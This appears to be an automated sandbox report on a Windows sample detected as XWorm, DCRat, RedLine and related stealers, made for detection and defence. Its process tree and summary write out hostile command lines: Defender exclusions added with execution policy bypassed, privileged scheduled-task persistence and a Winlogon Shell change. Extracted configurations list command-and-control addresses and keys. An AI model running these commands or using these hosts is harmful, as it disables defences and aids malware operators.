Windows Analysis Report
HaLCYOFjMN.exe

Overview

General Information

Sample name: HaLCYOFjMN.exe (renamed because original name is a hash value)
Original sample name: 3c30d3b3706b97a2a0638180bb159b44.exe
Analysis ID: 1585491
MD5: 3c30d3b3706b97a2a0638180bb159b44
SHA1: eeb4a51ebfac2ba3a159f2b9ee1a4b1caef3b960
SHA256: 7464ba97e34f2e95995d4a7a77e39409e57101d7ee156abf42f0b08deb192aa7
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, RedLine, XWorm, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • HaLCYOFjMN.exe (PID: 720 cmdline: "C:\Users\user\Desktop\HaLCYOFjMN.exe" MD5: 3C30D3B3706B97A2A0638180BB159B44)
    • powershell.exe (PID: 6768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5948 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rqbprm.exe (PID: 1748 cmdline: "C:\Users\user\AppData\Local\Temp\rqbprm.exe" MD5: 693F4A6FC50DDA899DE3F006DE04951E)
      • wscript.exe (PID: 2092 cmdline: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • portBrowserweb.exe (PID: 7392 cmdline: "C:\agentwebreviewDhcp/portBrowserweb.exe" MD5: 943D7E982E4BAB5A7CA659DC390E9A79)
            • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7360 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7512 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • csc.exe (PID: 6408 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 5808 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7740 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 7732 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7836 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • schtasks.exe (PID: 7928 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 4672 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5720 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 6548 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 11 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5076 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 60 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 7 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7580 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\agentwebreviewDhcp\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cnvwov.EXE (PID: 1860 cmdline: "C:\Users\user\AppData\Local\Temp\cnvwov.EXE" MD5: F50B390915773B882776BB3EF569C708)
      • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Update.exe (PID: 7188 cmdline: C:\Users\user\AppData\Roaming\Update.exe MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • Update.exe (PID: 1516 cmdline: "C:\Users\user\AppData\Roaming\Update.exe" MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • svchost.exe (PID: 7412 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Update.exe (PID: 5820 cmdline: C:\Users\user\AppData\Roaming\Update.exe MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • Update.exe (PID: 1416 cmdline: "C:\Users\user\AppData\Roaming\Update.exe" MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • System.exe (PID: 348 cmdline: "C:\Program Files\Windows Mail\System.exe" MD5: 943D7E982E4BAB5A7CA659DC390E9A79)
  • System.exe (PID: 4196 cmdline: "C:\Program Files\Windows Mail\System.exe" MD5: 943D7E982E4BAB5A7CA659DC390E9A79)
  • cleanup
Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: XWorm
Description: Malware with wide range of capabilities ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

{"C2 url": ["94.141.122.161"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": "http://122295cm.n9shteam.in/topollgamelongpoll", "MUTEX": "DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo"}
{"C2 url": ["94.141.122.161:7771"], "Bot Id": "button1"}

Source | Rule | Description | Author | Strings
HaLCYOFjMN.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
HaLCYOFjMN.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
HaLCYOFjMN.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
HaLCYOFjMN.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
HaLCYOFjMN.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xd1bf:$str01: $VB$Local_Port
  • 0xd1ec:$str02: $VB$Local_Host
  • 0xb4b5:$str03: get_Jpeg
  • 0xbad1:$str04: get_ServicePack
  • 0xe5ef:$str05: Select * from AntivirusProduct
  • 0xeb0b:$str06: PCRestart
  • 0xeb1f:$str07: shutdown.exe /f /r /t 0
  • 0xebd1:$str08: StopReport
  • 0xeba7:$str09: StopDDos
  • 0xec9d:$str10: sendPlugin
  • 0xee1d:$str12: -ExecutionPolicy Bypass -File "
  • 0xf17c:$str13: Content-length: 5235

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\agentwebreviewDhcp\portBrowserweb.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\agentwebreviewDhcp\portBrowserweb.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

Source | Rule | Description | Author | Strings
00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe0c5:$s6: VirtualBox
  • 0xe023:$s8: Win32_ComputerSystem
  • 0xfd35:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfdd2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfee7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xee97:$cnc4: POST / HTTP/1.1
00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
5.0.HaLCYOFjMN.exe.200000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
5.0.HaLCYOFjMN.exe.200000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
5.0.HaLCYOFjMN.exe.200000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
5.0.HaLCYOFjMN.exe.200000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xd1bf:$str01: $VB$Local_Port
  • 0xd1ec:$str02: $VB$Local_Host
  • 0xb4b5:$str03: get_Jpeg
  • 0xbad1:$str04: get_ServicePack
  • 0xe5ef:$str05: Select * from AntivirusProduct
  • 0xeb0b:$str06: PCRestart
  • 0xeb1f:$str07: shutdown.exe /f /r /t 0
  • 0xebd1:$str08: StopReport
  • 0xeba7:$str09: StopDDos
  • 0xec9d:$str10: sendPlugin
  • 0xee1d:$str12: -ExecutionPolicy Bypass -File "
  • 0xf17c:$str13: Content-length: 5235
5.0.HaLCYOFjMN.exe.200000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe2c5:$s6: VirtualBox
  • 0xe223:$s8: Win32_ComputerSystem
  • 0xff35:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xffd2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x100e7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf097:$cnc4: POST / HTTP/1.1

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\agentwebreviewDhcp\portBrowserweb.exe, ProcessId: 7392, TargetFilename: C:\agentwebreviewDhcp\WmiPrvSE.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Update.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HaLCYOFjMN.exe, ProcessId: 720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Windows Mail\System.exe", EventID: 13, EventType: SetValue, Image: C:\agentwebreviewDhcp\portBrowserweb.exe, ProcessId: 7392, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\agentwebreviewDhcp/portBrowserweb.exe", ParentImage: C:\agentwebreviewDhcp\portBrowserweb.exe, ParentProcessId: 7392, ParentProcessName: portBrowserweb.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", ProcessId: 6408, ProcessName: csc.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe", ProcessId: 5948, ProcessName: schtasks.exe
                                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 6408, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP", ProcessId: 7752, ProcessName: cvtres.exe
